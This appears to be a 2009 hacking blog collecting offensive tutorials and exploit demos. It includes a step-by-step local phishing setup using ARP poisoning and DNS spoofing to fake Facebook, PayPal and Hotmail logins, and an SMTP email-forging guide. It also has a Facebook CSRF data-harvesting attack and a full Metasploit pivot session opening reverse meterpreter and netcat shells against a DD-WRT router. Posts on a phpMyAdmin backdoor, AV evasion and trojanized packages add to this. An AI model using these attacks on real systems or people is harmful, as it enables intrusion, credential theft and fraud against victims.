Dec 31, 2009

Happy New Year 2010 !!



# ITS ©
# 2008 - 2009

Nov 30, 2009

Metasploit AV Evasion Technique





How to modify the meterpreter binary and make it undetectable by an Anti-Virus.


# ITS™
# 2008 - 2009

Nov 22, 2009

Hacking WPA with Pyrit



Pyrit takes a step ahead in attacking WPA-PSK and WPA2-PSK, the protocols that protect today's public WIFI-airspace. Pyrit's implementation allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff. The performance gain for real-world-attacks is in the range of three orders of magnitude which urges for re-consideration of the protocol's security. Exploiting the computational power of Many-Core- and other platforms through ATI-Stream, Nvidia CUDA, OpenCL and VIA Padlock.

# ITS ©
# 2008 - 2009

Modifying an MSN Conversation using an Ettercap Filter



In this video, Thomas shows us how to modify an MSN conversation at the network level. He uses an Ettercap filter and MITM attack to make this happen. The basic idea is to hijack the victim's Layer 2 and have all his traffic go through the attacker. Then the attacker can modify the traffc on the fly and inject it back into the network.

# ITS ©
# 2008 - 2009

Oct 26, 2009

Router Hacking

Router Hacking Part 1


Router Hacking Part 2


Router Hacking Part 3


Router Hacking 4

Router Hacking 5


Router Hacking 6


# ITS ©
# 2008 - 2009

Oct 18, 2009

Metasploit MSSQL Payload Delivery




Module added to MSF for delivering payload through MSSQL.
Payload HERE


# ITS ©
# 2008 - 2009

Oct 4, 2009

Deploying Metasploit as a Payload on a Rooted Box



# ITS ©
# 2008 - 2009

Cain and Abel Malformed RDP File Buffer Overflow



Cain and Abel is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. This issue affects Cain & Abel 4.9.24 and prior versions.
This is an example of how security and hacking tools themselves might be vulnerable to attack. You can download the exploit code from Milw0rm.


# ITS ©
# 2008 - 2009

Google.com Universal redirect maker

Video : View Here

PHP Script : Download Here

# ITS ©
# 2008 - 2009

Microsoft IIS FTPd NLST Remote Buffer Overflow



Microsoft IIS is prone to a remote stack-based buffer-overflow vulnerability affecting the application's FTP server. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.

This issue affects the following:

* IIS 5.0
* IIS 5.1
* IIS 6.0 (denial of service only)
* IIS 7.0 (denial of service only)


Note that Microsoft IIS 7.0 with FTP Service 7.5 is not affected.

Exploit Here : Klik Here

# ITS ©
# 2008 - 2009

Oct 3, 2009

Ubuntu Package Backdoor using a Metasploit


This is a great demo where he shows how to create a trojan using the xbomb game package. He creates the trojan by bundling a Metasploit reverse TCP stager payload with the game package. When the game is installed and executed, the Metasploit payload executes and connects back to the attacker, giving him a shell on the system. As most installations are done as root, this in most cases will end up becoming a root shell. :) Very creative! This is another example to show that Linux Malware can very easily be written and deployed, contrary to popular belief.

# ITS ©
# 2008 - 2009

Oct 2, 2009

Pwning using OpenVAS and Metasploit




OpenVAS stands for Open Vulnerability Assessment System and is a network security scanner with associated tools like a graphical user front-end. The core component is a server with a set of network vulnerability tests (NVTs) to detect security problems in remote systems and applications.

# ITS ©
# 2008 - 2009

Oct 1, 2009

Finding Subdomains using Goorecon



In the Information Gathering stage of a pentest, we are interested in finding out the various sub-domains of our target domain. As we have seen in previous videos, querying DNS servers using zone transfer requests or trying to retrieve entries using a dictionary / brute-forcing attack, is a good start, but fails in most cases. Another alternate technique to figure out sub-domains is to query google and check if it has found any sub-domains during it's web mining exercise on the target. Goorecon is just the tool we need in order to do this.
Download Goorecon :
http://www.darkoperator.com/tools-and-scripts/

# ITS ©
# 2008 - 2009

Remote Keylogger Firefox Addon

This video shows how easy is to make a remote keylogger as a firefox addon. With little knowlege on how to make a firefox addons and coding in javascript you can make a potentialy dangerous addon. You can read on how to make a firefox addon on:

https://developer.mozilla.org/En/Developing_add-ons

Video :
http://securitytube.net/Remote-Keylogger-Firefox-Addon-video.aspx

# ITS ©
# 2008 - 2009

Sep 30, 2009

XLSInjector

Injecting Meterpreter into Excel files using XLSInjector

By Milo2012

I have just written a new script to injects meterpreter shell to excel file.
This will speed up the pentesting process to embed malicious VBA scripts in excel files.
For this script to work, you will need windows, microsoft excel, perl and perl module Win32:OLE
To install perl module Win32:OLE (take note that its case sensitive)
C:\>  CPAN
cpan> install Win32:OLE
To run the script, simple type
[If you want it to download an excel file from the web]
C:\ perl xlsinjector.pl -u http://website/excel.xls -o 1234.xls
[If you want it to use a local excel file.  Put the excel file in the same folder as the script]
C:\ perl xlsinjector.pl -i excel.xls  -o 1234.xls
The -o argument is optional.

Video :
Download 
http://videos.securitytube.net/Injecting-Meterpreter-into-Excel-files-using-XLSInjector.mp4
View
http://securitytube.net/Injecting-Meterpreter-into-Excel-files-using-XLSInjector-video.aspx

# ITS ©
# 2008 - 2009

Session Hijacking


Session hijacking is the act of taking control of a user session after successfully obtaining or generating an authentication session ID. Session hijacking involves an attacker using captured, brute forced or reverse-engineered session IDs to seize control of a legitimate user's Web application session while that session is still in progress.


# ITS ©
# 2008 - 2009

Clickjacking


Clickjacking is the process of hijacking a user's click in a web browser and redirect it to do an entirely different action than desired by the user naturally. The way this is done is by creating a visual illusion, where the user is not able to see the real item he is clicking, instead he is made to believe that he clicking something entirely different.


A hacker accomplishes this by creating a transparent iframe which contains the target page in which there is an item he wants the victim to click. He then embeds this iframe into a malicious page controlled by him. When a user visits this malicious page, the hacker makes the iframe always hover under the user's mouse. As the iframe is transparent the user is never able to see it and thus clicks on one of the items in the malicious page. This click actually happens on the target item, in the target page. Thus the user is tricked into clicking something he never meant to.


# ITS ©
# 2008 - 2009

Sep 7, 2009

Browser based Exploitation using Metasploit and Ettercap



Web Browsers are slowly becoming a popular and easy attack vector for hackers. Recently, a lot of vulnerabilities were discovered in major browsers such as IE and Firefox. Also, the Flash player, ActiveX controls and PDF files have had a recent history of exploitable vulnerabilities. Exploit frameworks such as Metasploit and the new BeEF (Browser Exploitation Framework) have made the process very simple for hackers.

In this video, Chris Centore demonstrates a browser exploitation using Metasploit and Ettercap. The victim is on the same LAN as the attacker, but has its firewall enabled. Thus attacking service ports on the victim is ruled out. Chris redirects the victim's web traffic to his attack server running Metasploit by using Ettercap to conduct a DNS spoofing attack. Once the victim requests the attacker's server for a web page, it serves the victim the exploit. The victim succumbs and the attacker has complete access to the victim's computer. Chris explains the entire process in a very detailed yet simple to understand way. Great video!

# ITS ©
# 2008 - 2009

Sep 6, 2009

RootKits Analysis

RootKits Analysis PART 1



RootKits Analysis PART 2



Download "Hacker Defender Rootkit Here"
# ITS ©
# 2008 - 2009

Insert Backdoor via phpMyAdmin

1.
CREATE TABLE test(
Stack TEXT
)  TYPE=MYISaM;

INSERT INTO test(stack)
VALUES(
 ''
''
);
2.
select * into dumpfile 'www dir' from test;
# ITS ©
# 2008 - 2009

Sep 4, 2009

Ettercap filter html injection using Metasploit meterpreter payload

Ettercap filter html injection using Metasploit  "meterpreter" payload



# ITS ©
# 2008 - 2009

Sep 2, 2009

How to install IRC server (remotly) in aShell

Download UnrealIRCD by typing: wget http://ircd.ninth-gate.net/Unreal3.2.7.tar.gz 
Unzip the archive by typing : gunzip -d Unreal3.2.7.tar.gz 
Then: tar xvf Unreal3.2.7.tar
Type: cd Unreal3.2.7 
Then : ./Config
Now Answer those questions to the best of your knowledge. Generally if your not sure, the default will work!
Type: make
Then go to " Doc " typing : cd doc 
And type: pico example.conf and edit it .
type mv unrealircd.conf Unreal3.2.7/ to move it to Unreal3.2.7/
when you finish of all type ./unreal start 
now conetect to your IRCD Server 

  ITS ©
# 2008 - 2009

Email spoofing

Email spoofing

Want to know how to forge an e-mail? Want to send an e-mail to a friend with a fake address such as: "bush@whitehouse.gov"? It sounds tough doesn’t it? It’s really a lot easier than you’d think. This is actually a pretty old trick, but I thought some "new to the scene" hackers would like it. It is important to understanding email fundamentals if nothing else. First of all, will you need any special software for this? Are any special skills needed? Well, not really. If you can use telnet, you can do this. Telnet is a client you can use to make a connection to a remote computer as though you were signed on locally. This is a default tool included with Windows and most Linux distros.


Things to keep in mind:


Nowadays, everyone is worried about security. So, a lot of the mail servers you will run into will force you to login. However some are still wide open! Not all these servers are locked up. Some system admins just don’t know, or just don’t care about this. This is usually most prevalent in schools and universities who tend not to update as often as others. Sometimes, it is not locked up and it won’t even ask you for a login. Also keep in mind that the server most likely is recording everything you do. Most of the time, the mail server prints to a log file. So, you may not want to do this from home. Also, even though the e-mail has a forged name. If the target is smart enough, they can just look at the header from the e-mail and determine what server the mail came from. As the IP address will be in the header. This can be circumvented by learning more of the SMTP commands and routing your email through a proxy server.


On to the Hacking:


A lot of webservers use Sendmail as their mail server. SMTP (simple mail transfer protocol) is the protocol it uses. All this does is take care of the commands needed to send mail. Usually a mail server can be found on port 25. So for example, if we wanted to use the mail server at stankdawg.com, we would open up telnet, set the hostname to stankdawg.com (usually by issuing the "open" command), and then set the port to 25. Now connect.


When you first get there, you should see something like this:

Code:
220 stankdawg.com ESMTP Sendmail 8.12.5/8.12.5; Thu, 14 Nov 2002 18:39:56 -0500
It won’t do much else. It’s sitting there waiting for your commands. Go ahead, talk to it. The next step is to well, say "HI" to the server. And it will respond to you. Type: "HELO stankdawg.com" and watch what happens.


Code:
HELO stankdawg.com
250 stankdawg.com Hello yourhostname.net [your IP here], pleased to meet you


Now wasn’t that nice? This mail server is pleased to meet you. Ok, now let’s get down to it. You need to tell the server who this mail is coming from. Essentially, who YOU are, or who you’d like to be. Type this at the prompt: "MAIL FROM: yourdesiredname@anysite.com"

Code:
MAIL FROM: bios@microsoft.com
250 2.1.0 bios@microsoft.com... Sender ok


Now as far as it knows, that sender is ok. It’s cool with that e-mail address. Now we want to tell it who will be receiving this mail. Type: "RCPT TO: billgates@microsoft.com"

Code:
RCPT TO: billgates@microsoft.com
250 Recipient ok
All right, now we have the "to" and "from" info all entered and ready to go. Now let’s write this E-mail. It’s done by typing DATA, then type in your message. When you are finished typing the e-mail, hit enter.

Code:
DATA
Dear Bill,
You suck. And your software sucks. And that’s sad. 

250 Message accepted for delivery...
Now to disconnect from the server, just enter the command QUIT. That’s about it! Your mail is on its way! Most typical users will not be able to tell the difference unless they understand how to read the headers of their emails. Make them somewhat believable, and you can have lots of fun! Like I said earlier, this is an older trick. Some of you may not know about it. Some of you may. Either way, have fun with it. Enjoy yourself. And never stop exploring.


# ITS ©
# 2008 - 2009

0 Day Demos



We've started a new 0 day initiative  where we post videos of 0 Day Attacks. Request the community to refer us any 0 Day video they might come across and for original exploit coders to create videos . So, without further delay, here is the first 0 day demo:

Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit was discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team and relased on 31st Aug 2009. The exploit has been successfully tested on White Box 4(2.6.9-5.ELsmp), CentOS 4.4(2.6.9-42.ELsmp), CentOS 4.5(2.6.9-55.ELsmp), Fedora Core 4(2.6.11-1.1369_FC4smp), Fedora Core 5(2.6.15-1.2054_FC5) and Fedora Core 6(2.6.18-1.2798.fc6).

Exploit Download Here : Downlaod Exploit 



# IT-Security

# 2008-2009

 

Sep 1, 2009

Local Phishing

 Local Phishing
 I'v never seen a tutorial on how to do this so I figured I'd make one.

Ok so you may be asking whats the point of this? Well let me tell you.

Say you broke into a wireless network and want to get some passwords.
You arp poison your victims and use an ssl stripping tool to be able to sniff passwords.
The target gets tipped off by the certificate warning. So you fail.
So you want to dsn spoof your target to a phisher.
But the problem is that you can only dns spoof to an ip address.
This means you cannot spoof them to a phisher on a free hosting domain.
You set up apache hosting your phisher and dns spoof them to your local ip.
This is great, but you're limited to only one phisher.
This tutorial will show you how to set up multiple Ip's and the set up virual hosts in apache for those ips.


Step 1: Set multiple IP's

Let's make 3. (you can have as many as you want)

Code:
sudo ifconfig wlan0:1 up 192.168.1.123
sudo ifconfig wlan0:2 up 192.168.1.124
sudo ifconfig wlan0:3 up 192.168.1.125
Some times it will give you an error like this.

Code:
SIOCSIFFLAGS: Cannot assign requested address
If you just type in the same command again it should work

Ok now check if they're up

Code:
sudo ifconfig -a
you should see your new virtual interfaces. (wlan0:1, wlan0:2, wlan0:3)

Step 2: Set up apache

Code:
sudo nautilus /var/www/
Create 3 folders, one for each phisher. I'll be using hotmail, paypal and facebook.

/var/www/hotmail/
/var/www/paypal/
/var/www/facebook/

put you phishers in those folders.
(When I do this I edit my phishers so they all write to one log file so it's easier to keep track of what you got.)

Now you need to edit the apache2.conf file.
Code:
sudo nautilus /etc/apache2/sites-enabled/
Open the configuration file in there (mine was called 000-default).
Now you need to add a virtual host entry for every one of your ip addresses.
Make sure to change the ServerName and DocumentRoot to match your setup.
In my case i'll add three. (You add these to the bottom of the file)

Code:

ServerName 192.168.1.123
DocumentRoot /var/www/facebook/



ServerName 192.168.1.124
DocumentRoot /var/www/paypal/



ServerName 192.168.1.125
DocumentRoot /var/www/phish/hotmail/
Start apache

Code:
sudo /etc/init.d/apache2 start
Open up firefox and browse to each one of your ips and make sure the phishers come up.

Step 3: Dns spoof/Arp poison with ettercap

Backup the dns_spoof configuration file

Code:
sudo mv /usr/share/ettercap/etter.dns /usr/share/ettercap/etter.dns.backup
Edit the file

Code:
sudo echo "www.facebook.com A 192.168.1.123" >> /usr/share/ettercap/etter.dns
sudo echo "www.paypal.com A 192.168.1.124" >> /usr/share/ettercap/etter.dns
sudo echo "www.hotmail.com A 192.168.1.125" >> /usr/share/ettercap/etter.dns
Start ettercap arp poison with the dns_spoof plugin

Code:
sudo ettercap -T -i wlan0 -M arp:remote /192.168.1.1/ /192.168.1.102/ -P dns_spoof
replace 192.168.1.102 with your target's ip.
replace 192.168.1.1 with your gateway ip.
replace wlan0 with your interface.
# ITS ©
# 2008 - 2009

Packing Metasploit's Meterpreter with Calculator using IExpress



This video demonstrates how a built in tool of XP and Vista (IExpress), can be used to pack a malicious payload with a real program to make it less likely for a user to think anything malicious is happening. 
# ITS ©
# 2008 - 2009

MetaSploit Autopwn Tool



This Video shows MetaSploit Autopwn tool in action.After identifying a victim's machine using port scanning techniques,Just run the Metasploit framework and connect to sqlite database.Again run a port scan on victim's machine so that the result is saved in the database.Then run the Autopwn tool against the port scan result,Autopwn will automatically run all the exploits against the open port.When the attack completes successfully, we get open sessions. Job Done !!!!

This can also be achived by running Autopwn exploits against the result saved by Nessus in NBE format.
# ITS ©
# 2008 - 2009

Psnuffle credentials sniffing module demo

Psnuffle credentials sniffing module


# ITS ©
# 2008 - 2009

Packet Injection Basics

The Packet Injection basics presentation is an in-depth tutorial on various packet injection programming techniques. We will look at how to construct various headers and then bunch them together to form a complete packet and then how to send this packet over the network. This presentation is a necessary pre-requisite for all the other packet injection videos in this tutorial series.
Download the presentation : Download 
Video : 

# ITS ©
# 2008 - 2009

Rethinking Passwords

At the GOVCERT.NL Security Conference 2008 in the Netherlands, William Cheswick (AT&T Labs) gave this talk called 'Rethinking Passwords'.
Abstract: Passwords and PINs are used everywhere these days, but their use is often painful. Traditional password advice and rules are seldom appropriate for today's threats, yet we labor on with the password rules and servers of yesteryear. Strong passwords are weakening our security, and it is time to fix that. There are numerous proposals for new password solutions. I will present a few half-baked ideas. But good solutions are currently available. We are facing much more worrisome security challenges: we ought to get this easy stuff right.

# ITS ©
# 2008 - 2009

Defcon 17 "Unmasking You"

Defcon 17  

"Unmasking You" 

This is the video of the presentation titled "Unmasking You" given by Jabra and Rsnake at Blackhat09 and Defcon 17. Many people and organizations depend upon proxies and numerous other privacy techniques to mask their true identity. The problem is there are often flaws within these technologies. This talk will demonstrate several of these flaws and as well as weaknesses in well known implementations. There will be several new anti-privacy 0days released.

The talk video, presentation and other material can be downloaded here. Jabra has a blog post on the Rapid7 blog about the talk. This video was referred to us by Rohit of Clubhack.


# ITS ©
# 2008 - 2009

Multiple CRLF Injection / HTTP Response Splitting Vulnerabilities In Google AdWords

Descriptions:

Google AdWords is vulnerable to a new form of application attack technique called HTTP Response
splitting (aka CRLF Injection). HTTP Response Splitting enables an attacker to alter the HTTP
response header structure which can leads to various range of attacks such as web cache poisoning,
temporary defacement, hijacking pages or cross-site scripting (XSS). This happens since the user input is
injected into the value section of http header without properly escaping/removing CRLF characters
which can leads to two HTTP responses instead of one response.

II. Affected Links:

GET /select/ProfessionalWelcome?hl=%0d%0afakeheader&null=Go HTTP/1.0
GET /select/Login?hl= hl=%0d%0afakeheader&null=Go HTTP/1.0
Proof-of-concept:
[Request Details]
Screenshot a: Custom HTTP response added to “hl” parameter
  [Response Header]
 
Solution:
Sanitize CR(0x13) and LF(0x10) from the user input or properly encode the output in order to prevent
the injection of custom.
-----
Vendor Name: Google
Product Name: Google AdWords (https://adwords.google.com/)
----------
# ITS ©
# 2008 - 2009

Facebook "CSRF" attack-Full Disclosure

 How a Facebook App works
Anyone can create an application (or app) that will run within the Facebook platform (and many do!). An app is like a regular website with the aditional benifits of the social network Facebook provides (such as friends, profiles boxes, walls etc).
Technically, a Facebook app is just like a website: its mounted on a normal web sever and serves content to HTTP requests. The difference is that while a normal website receives requests directly from its users, an app has the Facebook platform as a middle man, between the user and the application.



In a regular web site, the user's browsers requests the web content directly from the web server. In contrast, a Facebook application has a "front" address in the apps.facebook.com domain. The user accesses this address and Facebook itself contacts the app server for the content through its real address back.quaji.com.

What Facebook tells the application about the user
Referring to Figure 1, When the user engages the application (arrow 1), Facebook will add some of the user's personal information when contacting the app server (arrow 2), so the response (arrow 3) could be personolized. What details excatlly it sends along depends on many variables, most notabely if the user has authorized the app.

However, Facebook has a module called Automatic Authentication (which sounds like trouble just by its name...). This mechanism allows the app to receive some of the user's info automatically, without the user's consent. These details include full name, profile picture, and friends list.

This, as the saying goes, is a feature not a bug. Its a blaring example of the lenient security model Facebook adopted in the name of functionality, or in their own words: "to develop fully-featured social applications with the least possible amount of friction."
this means any application you access, even before you authorize it, knows quite a lot about you.
But at least you initiated the interaction, right?

The Vulnerability
In the role of the hacker, what we want is to set up an app, have the user's browser access it without his knowledge, and get all the personal information Facebook's Automatic Authentication so graciously gives us.
Facebook for their part try to take precautions against just this type of attack. The docs state:
"This parameter (the user ID) will not always appear. If the user has set stronger privacy settings or is redirected from a non-Facebook URL, this parameter will return null."

Now, 99% of the users do not change their default settings, so the first limitation is not a
problem. But the second is something that requires "fixing". It means that only if you actually engage the application by clicking a link to it (maybe on somebody's wall) will the personal info be sent. We need a way to trick Facebook into think the app page it is clandestinitly accessing, is a result of the user's interaction.

The core of the matter
It turns out that a simple redirect from one page to another in the same application, fools Facebook because the second request originates from a Facebook URL (the first request). Therefore, the second request activates Automatic Authentication and personal info is sent.
To illustrate this imagine the following scenario:
  • Browser is directed to
    Code:
    http://apps.facebook.com/hacker-app/step1.php
    Facebook correctly notices that the URL did not originate from with the Facebook domain, and no information is sent. However, step1.php causes a redirect to step2.php.
  • Browser is directed to
    Code:
    http://apps.facebook.com/hacker-app/step2.php
    This time, the access seems to have originated from the Facebook domain! Specifically from step1.php. Therefore, personal information is sent along with the request.
Viola.
We have managed to bypass the restriction set forth by AA. But what can we do with this?


The Exploit
Ah, the interesting part. :)
The simplest way to expoit this is by luring the innocent user to a page on our website (say by sending a link in the mail). In this page we can cause the user's browser to access any URL (using a hidden IFRAME for example). Specifically we'll send the user to:
Code:
http://apps.facebook.com/hacker-app/step1.php.
This will cause the browser to then go to step2.php and we get the info.

However there is a much more powerful attack possible here (thanks S.B).
We can craft the entire thing in an IMG tag. An IMG tag also causes the browser to go the specified address looking for image data. And if the the browser recieves a redirect response, it relentlesly goes through it looking for those pixels.
The huge difference between the two approches is that many blogs/forum sites allow user comments to contain IMG tags, and therfore the attack can be launched without having the user visit our website. Instead, merely viewing a "treated" forum thread will cause the attack to take place.

The icing on the cake
Hacking is an elegant art. As such, an exploit is messured by its finishing touches, as much as its payload. While having an IMG tag point to
Code:
http://apps.facebook.com/hacker-app/step1.php
will work, it is suspicious, and the user ends up with a broken image. So we add:
  • IMG tag point to a normal looking URL such as
    Code:
    http://quaji.com/attack.gif.
    However, becuase the address resides on our server, this URL does not return an image but rather a redirect to
    Code:
    http://apps.facebook.com/hacker-app/step1.php.
    This allows to stop the attack at anytime without leaving a trace by causing this URL to return a normal image instead of a redirect.
  • The second app page, step2.php, after collecting the user's information, can further redirect the user's browser to an actual normal image. Facebook allows this, and a redirect from an application page to an external address goes unaltered. This causes the browser to finally find pixels and display an image to the user. The user will notice nothing, as the end behaviour is complete normal.

Lets see this all put together:




Figure 2. The anatomy of the full fledged attack

  1. User naively surfs to a well-known and trusted forum at forum.com.
  2. The thread he is viewing contains a malicious comment with an IMG tag point at quaji.com
  3. The user's browsers attempts to retrieve the image
  4. but instead is redirected to
    Code:
    http://apps.facebook.com/hacker-app/step1.php.
  5. The request is forwarded through the Facebook platform,
  6. to the hackers app server
  7. and is again redirected to
    Code:
    http://apps.facebook.com/hacker-app/step2.php.
  8. and back to the browser.
  9. Browser attempts
    Code:
    http://apps.facebook.com/hacker-app/step2.php
  10. The Facebook platform passes the request to the hacker's app server adding the user's personal information after being tricked into thinking it should do so.
  11. To finish off, a redirect is issused to a proper image.


Aftermath
This is special type of CSRF attack in which the hacker not only causes an action on behalf of the user, he is also at the recieving end, obtaining the stolen information.
The attack in its final form is very powerful and it was surprising even to me. While the specific vulnerability in this case was a glitch in the Automatic Authentication process, the rest of the attack is based on the normal behaviour of web browsers and servers. For this reason I presume this attack method is still applicable to Facebook and other sites that collect personal information. If you find another example, I'd love to hear about it.
Vid here :
Code:
http://securitytube.net/CSRF-Attack-Demo-against-Facebook-video.aspx



# ITS ©
# 2008 - 2009

Using Metasploit DD-WRT Exploit Module Thru Pivot

Using Metasploit DD-WRT Exploit Module 
Thru Pivot

Metasploit now has in the 3.3 Dev SVN an exploit for embedded device Linux distribution DD-WRT. This exploit module abuses a metacharacter injection vulnerability in the HTTP management server of wireless gateways running DD-WRT. This flaw allows an unauthenticated attacker to execute arbitrary commands as the root user account. It was argued that this exploit is of low impact by some since the distribution only listens for HTTP connections thru the internal interface. In this example of using the exploit the exploit will be used thru a pivot obtained thru a client side exploit from which we will pivot, do a discovery, finger print the device and exploit it. In the following example we will start by showing our IP of the attacker machine, receiving the Meterpreter shell and showing the target box IP thru a cmd shell:
msf > ifconfig
 eth0[*] exec: ifconfig eth0eth0
      Link encap:Ethernet  HWaddr 00:0e:7f:f9:12:62  
      inet addr:192.168.1.158  Bcast:192.168.1.255  Mask:255.255.255.0
      inet6 addr: fe80::20e:7fff:fef9:1262/64 Scope:Link
      UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
      RX packets:55461 errors:0 dropped:0 overruns:0 frame:0         
      TX packets:23899 errors:0 dropped:0 overruns:0 carrier:0
      collisions:0 txqueuelen:1000
      RX bytes:58889891 (58.8 MB)  TX bytes:3107063 (3.1 MB)
Interrupt:20
 msf > use exploit/multi/handler
 msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
 PAYLOAD => windows/meterpreter/reverse_tcp
 msf exploit(handler) > set LHOST 192.168.1.158
 LHOST => 192.168.1.158
 msf exploit(handler) > set ExitOnSession false
 ExitOnSession => false
 msf exploit(handler) > exploit -j -z[*] 
 Exploit running as background job.
 msf exploit(handler) >
 [*] Handler binding to LHOST 0.0.0.0
 [*] Started reverse handler
 [*] Starting the payload handler...
 [*] Transmitting intermediate stager for over-sized stage...(216 bytes) 
 [*] Sending stage (718336 bytes)
 [*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.100:1085)
 msf exploit(handler) > session -i 1
 [-] Unknown command: session.
 msf exploit(handler) > sessions -i 1
 [*] Starting interaction with 1...
 meterpreter > sysinfo
 Computer: AWINXP01
 OS      : Windows XP (Build 2600, Service Pack 2).
 meterpreter > execute -H -f -c -i -f cmd.exe
 Process 1708 created.Channel 1 created.
 Microsoft Windows XP [Version 5.1.2600]
 (C) Copyright 1985-2001 Microsoft  Corp.
 C:\Documents and Settings\administrator\Desktop>ipconfig
 ipconfig
 Windows IP ConfigurationEthernet adapter Local Area Connection:
 Connection-specific DNS Suffix  . : 
 IP Address. . . . . . . . . . . . : 192.168.111.200
 Subnet Mask . . . . . . . . . . . : 255.255.255.0
 Default Gateway . . . . . . . . . : 192.168.111.2
 C:\Documents and Settings\administrator\Desktop>exit
 meterpreter >
Know we proceed to background this session and set a route thru the session to the network behind the NAT router from the information we gathered:
meterpreter > Background session 1? [y/N] 
 msf exploit(handler) > 
 msf exploit(handler) > route add 192.168.111.0 255.255.255.0 1
 msf exploit(handler) > route print
 Active Routing Table==================== 
 Subnet                  Netmask            Gateway
  ------                       -------                 ------- 
  192.168.111.0      255.255.255.0      Session 1  
msf exploit(handler) >
Now that the route is created we can use the TCP Port Scanner Auxiliary Module to do a TCP scan of the default gateway of the target network:
msf exploit(handler) > use auxiliary/scanner/portscan/tcp
 msf auxiliary(tcp) > info
 Name: TCP Port Scanner
  Version: 6823   
  License: Metasploit Framework License (BSD)
Provided by: 
  hdm 
  kris katterjohn 
  Basic options:
  Name        Current    Setting    Required    Description  
     ----        ---------------     --------  -----------       --------------
PORTS      1-10000                   yes       Ports to scan (e.g. 22-25,80,110-900)             RHOSTS                                  yes       The target address range or CIDR identifier     THREADS   1                           yes       The number of concurrent threads               TIMEOUT   1000                       yes       The socket connect timeout in milliseconds   Description:
  Enumerate open TCP services
msf auxiliary(tcp) > set PORTS 22,23,80,443
PORTS => 22,23,80,443msf auxiliary(tcp) > set RHOSTS 192.168.111.2
RHOSTS => 192.168.111.2
msf auxiliary(tcp) > run[*]  TCP OPEN 192.168.111.2:22[*]  TCP OPEN 192.168.111.2:23[*]  TCP OPEN 192.168.111.2:80[*] Auxiliary module execution completed
msf exploit(handler) >
Since we are going thru a Meterpreter TCP pivot is important to remember to keep the THREAD variable to 1 since Meterpreter is not multithreaded and limit the number of ports to those you want to target so as to not expend a large amount of time scanning. Now that the ports that are open we proceed to finger print one of the services by getting the banner using the connect command in Metasploit:
msf exploit(handler) > connect -c 1 192.168.111.2 23
[*] Connected to 192.168.111.2:23
DD-WRT v24 std (c) 2007 NewMedia-NET GmbHRelease: 01/26/07 (SVN revision: 5660M)
�
DD-WRTx86CI login: ^Cmsf exploit(handler) >
msf exploit(handler) >
As we can see the Telnet login banner identifies the target machine as a DD-WRT box. We know proceed to load the exploit module and set a reverse netcat payload and set the other appropriate variables. Onece we have ran the exploit and a session is created we proceed to run the Linux uname command to check the version of the device and to also check the shell is working:


msf exploit(handler) > use exploit/linux/http/ddwrt_cgibin_exec
 msf exploit(ddwrt_cgibin_exec) > set PAYLOAD cmd/unix/reverse_netcat
 PAYLOAD => cmd/unix/reverse_netcat
 msf exploit(ddwrt_cgibin_exec) > set LPORT 2222
LPORT => 2222
msf exploit(ddwrt_cgibin_exec) > set RHOST 192.168.111.2
RHOST => 192.168.111.2
msf exploit(ddwrt_cgibin_exec) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
msf exploit(ddwrt_cgibin_exec) > exploit
[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler.[*] Sending GET request with encoded command line.....[*] Command shell session 2 opened (192.168.1.158:2222 -> 192.168.1.100:4531)..
uname -aLinux DD-WRTx86CI 2.6.19.2dd-wrt #45 Fri Jan 26 06:28:01 CET 2007 i686 unknown
One advantage is that since the shell is running thru a Meterpreter session all traffic outside of the target network to the attackers box is encrypted using SSL.
The metasploit exploit is avaible here :  Go To Exploit
# IT-S ©
# 2008 -2009 

Aug 31, 2009

Packet Sniffing - "protocol decoding and surveillance"

Introduction

Packet Sniffing is a fascinating subject. It wears both hats, the good and the evil. It's used by many (including myself) to detect network faults etc...but the same technology allows someone to "sniff" out passwords for your mail account or even your internet account. Now you understand why securing/encrypting your data is so important.

When a file is "deleted" what actually happens? Your operating system removes the reference to that file on the file system. This reference had details such as where on the disk the file was. Whilst marked and available as free space the old data didn't move, its just not seen on the file system but physically exisits on the disk. The entire file remains on the disk until another data is created over the physical area, and even then it may be possible to recover data by studying the magnetic fields on the platter surface.

What's a packet sniffer?


When you make contact with the Internet, data isn't sent in one continuous stream of data; this would be impractical and it would limit the performance of the Internet network. To keep the performance of the Internet as high as possible, the data is cut in slices. Such a slice of data (either inbound or outbound) is called "a packet". Now, you can't see atoms with your naked eye can you? No, I thought so. Sending information on a network means sending "packets" of data. Think of them like the atoms. A lot of packets will create the final information you will see on your screen, be it website or email. To "see" the atoms you would need a special device, some kind of electron microscope, to be able to see the "packets" you've sent or received... you also need a special device. This is a special type of monitoring program called... a packet sniffer. By using a packet sniffer you're able to see any bit of information entering or leaving your computer... even those you normally wouldn't see!

A packet sniffer can be considered as a sort of wire tap device. A device that can "plug" into computer networks and eavesdrops on the network traffic. Just as a telephone wiretap allows the CIA to listen to conversations, the same concept follows a packet sniffer in the sense that it allows someone to listen in on computer conversations.

How packet sniffers work


Packet sniffers capture "binary" data passing through the network, most if not all decent sniffers "decode" this data into a human readable form. To make it even easier (for humans) another step occurs known as "protocol analysis". There is a varying degree of the analysis that takes place, some are simple, just breaking down the "packet" information. Others are more complex giving "detailed" information about what it sees on the packet (i.e., highlights a password for a service).

One very important (and very simple) point to understand is that the sniffer has to be on the same "wire" on which the data is travelling to. In short the "probing" device that "captures" the data has to be on the same wire. The data can then be relayed to a decoding computer on a different network.

Situation: Bob and John are engaged in a internet chat session. You are in a city far apart from where the two men reside. Bob and John are talking top secret details on a cocaine deal. You (the law abiding citizen) decide to sniff their chat session (from your location) to help the feds bust Bob and John.

The simple answer is you CAN'T do that as you don't have access to the path that the data travels from! Of course if you are a good hacker (or well Cracker) then you could install a Trojan on Bob or John's computer and run a sniffer from their system, thus the sniffer it self is on the same wire.

When packet sniffing will work and won't work


